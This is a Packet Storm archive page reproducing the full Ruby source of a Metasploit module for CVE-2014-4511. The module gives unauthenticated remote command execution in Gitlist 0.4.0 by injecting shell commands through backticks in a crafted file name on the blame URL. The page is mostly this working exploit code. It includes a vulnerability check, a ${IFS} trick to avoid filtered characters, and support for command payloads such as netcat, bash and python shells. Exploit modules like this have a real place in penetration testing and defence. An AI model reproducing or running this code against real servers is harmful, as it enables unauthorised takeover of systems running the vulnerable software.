what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Gitlist Unauthenticated Remote Command Execution

Gitlist Unauthenticated Remote Command Execution
Posted Jul 6, 2014
Authored by drone, Brandon Perry | Site metasploit.com

This Metasploit module exploits an unauthenticated remote command execution vulnerability in version 0.4.0 of Gitlist. The problem exists in the handling of an specially crafted file name when trying to blame it.

tags | exploit, remote
advisories | CVE-2014-4511
SHA-256 | 2d10e7f5052c363ec8a9a489e9f7c7fd6b0f2a333365ccb4fc9fa7413a6b823c

Gitlist Unauthenticated Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Gitlist Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated remote command execution vulnerability
in version 0.4.0 of Gitlist. The problem exists in the handling of an specially
crafted file name when trying to blame it.
},
'License' => MSF_LICENSE,
'Privileged' => false,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'drone', #discovery/poc by @dronesec
'Brandon Perry <bperry.volatile@gmail.com>' #Metasploit module
],
'References' =>
[
['CVE', '2014-4511'],
['EDB', '33929'],
['URL', 'https://hatriot.github.io/blog/2014/06/29/gitlist-rce/']
],
'Payload' =>
{
'Space' => 8192, # max length of GET request really
'BadChars' => "&\x20",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash gawk netcat netcat-e ruby php openssl',
}
},
'Targets' =>
[
['Gitlist 0.4.0', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 30 2014'
))

register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
], self.class)
end

def check
repo = get_repo

if repo.nil?
return Exploit::CheckCode::Unknown
end

chk = Rex::Text.encode_base64(rand_text_alpha(rand(32)+5))

res = send_command(repo, "echo${IFS}" + chk + "|base64${IFS}--decode")

if res && res.body
if res.body.include?(Rex::Text.decode_base64(chk))
return Exploit::CheckCode::Vulnerable
elsif res.body.to_s =~ /sh.*not found/
return Exploit::CheckCode::Vulnerable
end
end

Exploit::CheckCode::Safe
end

def exploit
repo = get_repo
if repo.nil?
fail_with(Failure::Unknown, "#{peer} - Failed to retrieve the remote repository")
end
send_command(repo, payload.encoded)
end

def get_repo
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/")
})

unless res
return nil
end

first_repo = /href="\/gitlist\/(.*)\/"/.match(res.body)

unless first_repo && first_repo.length >= 2
return nil
end

repo_name = first_repo[1]

repo_name
end

def send_command(repo, cmd)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, repo, 'blame', 'master', '""`' + cmd + '`')
}, 1)

res
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close